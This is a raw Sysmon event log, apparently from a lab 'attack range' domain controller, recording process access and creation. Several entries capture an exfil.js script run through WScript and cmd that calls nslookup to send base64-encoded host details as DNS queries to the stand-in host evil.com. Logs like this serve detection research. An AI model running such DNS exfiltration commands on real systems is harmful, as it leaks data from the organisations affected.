10341000x8000000000000000211549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.247{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.247{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.247{2E1864BB-18F3-629A-B044-000000005F02}81284212C:\Windows\system32\cmd.exe{2E1864BB-18F3-629A-B244-000000005F02}6232C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.260{2E1864BB-18F3-629A-B244-000000005F02}6232C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F3-629A-B044-000000005F02}8128C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbxfmn.tmp 2>&1 10341000x8000000000000000211545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.231{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-B144-000000005F02}5936C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.231{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-B144-000000005F02}5936C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.215{2E1864BB-18F3-629A-B144-000000005F02}59364484C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-B044-000000005F02}8128C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.200{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-B144-000000005F02}5936C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.200{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.200{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.200{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.200{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.200{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-B044-000000005F02}8128C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.200{2E1864BB-18E0-629A-6742-000000005F02}39767664C:\Windows\System32\WScript.exe{2E1864BB-18F3-629A-B044-000000005F02}8128C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.204{2E1864BB-18F3-629A-B044-000000005F02}8128C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbxfmn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.184{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvkhwpbj.tmpMD5=B2B1D75715AF357A6B4398F385A141DD,SHA256=A1FA40C2F8588360C75C13349E8A2F679279989093D68809396DFBEE5B7D57B5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.163{2E1864BB-18F3-629A-AE44-000000005F02}10283968C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-AF44-000000005F02}6160C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.148{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.148{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.148{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-AF44-000000005F02}6160C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.148{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.148{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.148{2E1864BB-18F3-629A-AD44-000000005F02}53526824C:\Windows\system32\cmd.exe{2E1864BB-18F3-629A-AF44-000000005F02}6160C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.160{2E1864BB-18F3-629A-AF44-000000005F02}6160C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F3-629A-AD44-000000005F02}5352C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvkhwpbj.tmp 2>&1 10341000x8000000000000000211525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.131{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-AE44-000000005F02}1028C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.131{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-AE44-000000005F02}1028C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.131{2E1864BB-18F3-629A-AE44-000000005F02}10283968C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-AD44-000000005F02}5352C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.117{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-AE44-000000005F02}1028C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.117{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-AD44-000000005F02}5352C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.117{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.117{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.117{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\S